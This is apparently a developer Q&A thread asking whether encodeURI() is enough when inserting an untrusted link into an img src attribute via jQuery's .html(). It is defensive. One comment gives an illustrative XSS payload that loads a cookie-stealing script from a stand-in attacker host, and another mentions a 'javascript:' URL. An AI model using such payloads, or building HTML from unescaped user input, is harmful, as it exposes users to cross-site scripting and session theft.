# strUntrustedUserLinkIs encodeURI() enough, or should you also escape for attributes?

Tags: javascript, encoding, escaping

Suppose I have the following javascript, where I am inserting a user link into an image, before putting it into a div.

```
<div id="divString"></div>

<script type="text/javascript">
 var strUntrustedUserLink = '/path/to/image.jpg';
 $('#divString').html('<img src="'+encodeURI(strUntrustedUserLink)+'">');
</script>
```

Is it enough to only escape with encodeURI() ? Or should I further escape it with a function that escapes for attributes (which doesn't exist very well in Javascript, ie. I only read that you have to make it yourself), like so:

```
<div id="divString"></div>

<script type="text/javascript">
 var strUntrustedUserLink = '';
 $('#divString').html('<img src="'+strSomeEscapeFunctionForAttributes(encodeURI(strUntrustedUserLink))+'">');
</script>
```

I would imagine that encodeURI escapes some hazardous chars for links, but doesnt take any account for contexts in which the link will be displayed, ie. the echoed context could be HTML or element attributes or CSS or...

EDIT: Found a var typo, and added some clarification

Comment: What are you wondering about? Why are you concerned about encoding the URL? What are you trying to fix or prevent?

Comment: @Pointy: I suppose a user could add a link like http://search.com?query=<script>document.download('http://hackersgallore.com/stealYOURcookieeeeeee.js')</script>.jpg This wouldn't strictly work, but you get the concern here, which I am trying to prevent.

Comment: I think that what you need to worry about is HTML-encoding, not URL encoding. You're trying to prevent the HTML parser from interpreting the URL content as HTML, so that's the sort of encoding that's relevant.

Comment: You mean attribute encoding/escaping? This will not escape ':' characters, so link values like 'javascript:somehackfunction()' will still be interpreted... or am I wrong?

Comment: Yes, you could also escape ":" if you wanted to, or just disallow URL values that start with "javascript:".